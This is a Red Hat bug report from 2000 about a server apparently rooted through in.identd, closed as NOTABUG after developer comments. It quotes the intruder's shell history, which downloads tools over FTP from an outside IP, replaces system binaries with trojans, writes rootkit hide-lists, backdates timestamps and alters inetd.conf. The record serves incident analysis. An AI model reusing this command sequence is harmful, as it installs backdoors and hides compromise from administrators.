Bug 10941 - Rooted through in.identd on Red Hat 6.0
Summary: Rooted through in.identd on Red Hat 6.0
Keywords:
Status: CLOSED NOTABUG
Alias: None
Product: Red Hat Linux
Classification: Retired
Component: inetd
Version: 6.0
Hardware: All
OS: Linux
medium
medium
Target Milestone: ---
Assignee: Trond Eivind Glomsrxd
QA Contact:
URL:
Whiteboard:
Depends On:
Blocks:
TreeView+ depends on / blocked
 
Reported: 2000-04-20 12:07 UTC by smedina
Modified: 2008-05-01 15:37 UTC (History)
1 user (show)

Fixed In Version:
Doc Type: Bug Fix
Doc Text:
Clone Of:
Environment:
Last Closed: 2001-01-19 21:15:46 UTC
Embargoed:

Attachments (Terms of Use)

Description smedina 2000-04-20 12:07:20 UTC 
-----Original Message-----
From: Del Elson [del.AU]
Sent: Wednesday, April 19, 2000 1:02 AM
To: INCIDENTS
Subject: Rooted through in.identd on Red Hat 6.0


Hi,

A client was hacked last week by what looked like a buffer
overflow through in.identd.  This was on a Red Hat 6.0
box.

RH don't have any current security notices or fixes for
in.identd on their servers, and I haven't seen other
boxes hacked through in.identd recently.

The hacker left the usual trace in /.bash_history, which
ran like:

mkdir /usr/lib/... ; cd /usr/lib/...
ftp 200.192.58.201 21
cd /usr/lib/...
mv netstat.gz? netstat.gz; mv ps.gz? ps.gz; mv pstree.gz?
pstree.gz;
mv pt07.gz? pt07.gz; mv slice2.gz? slice2.gz; mv syslogd.gz?
syslogd.gz;
mv tcpd.gz? tcpd.gz
gzip -d *
chmod +x *
mv netstat /bin ; mv ps /bin ; mv tcpd /usr/sbin/; mv
syslogd /usr/sbin;
mv pt07 /usr/lib/; mv pstree /usr/bin ;
/usr/lib/pt07
echo "2 sh" >> /dev/cui220 ; echo "2 slice2" >> /dev/cui220
;
echo "2 bnc" >> /dev/220 ; echo "4 6667" >> /dev/cui221 ;
echo "3 15678" >> /dev/cui221 ; echo "2 pt07" >> /dev/cui220
;
echo "3 1679" >> /dev/cui221; echo "3 5454" >> /dev/cui221;
touch -t 199910122110 /dev/cui220
touch -t 199910122110 /dev/cui221
touch -t 199910122110 /usr/lib/pt07
touch -t 199910122110 /usr/sbin/syslogd
touch -t 199910122110 /usr/sbin/tcpd
touch -t 199910122110 /bin/ps
touch -t 199910122110 /bin/netstat
touch -t 199910122110 /usr/bin/pstree
cat /etc/inetd.conf | grep -v 15678 >> /tmp/b
mv /tmp/b /etc/inetd.conf
killall -HUP inetd

... installing a back door and a partial cover of tracks.

The only messages in /var/log/messages around the time
were:

Apr  8 23:15:57 home identd[12006]: Connection from
200.192.58.201
Apr  8 23:15:57 home identd[12006]: from: 200.192.58.201 (
200.192.58.201 ) for: 1176, 21
Apr  8 23:16:05 home identd[12007]: Connection from
200.192.58.201
Apr  8 23:16:05 home identd[12007]: from: 200.192.58.201 (
200.192.58.201 ) for: 1176, 21

... the IP address traces back to somewhere in Brazil.

Anyone know of any current bug notices, exploits, or
patches for in.identd?

Del
Comment 1 Jeff Johnson 2000-05-11 16:46:59 UTC 
Why do you think the exploit is in.identd? Because of the messages?
/usr/sbin/inetd is a much likelier target, but I don't know of any
current exploits there.
Comment 2 Pekka Savola 2000-05-11 18:07:59 UTC 
I fear some by-default inetd-enabled services e.g. in.telnetd still have
a hole in them.

Please see my report #10860.
Comment 3 Trond Eivind Glomsrxd 2001-01-20 00:57:02 UTC 
Still no sign of bugs in identd (which at least now run as nobody or ident
anyway)... closing.
Note You need to log in before you can comment on or make changes to this bug.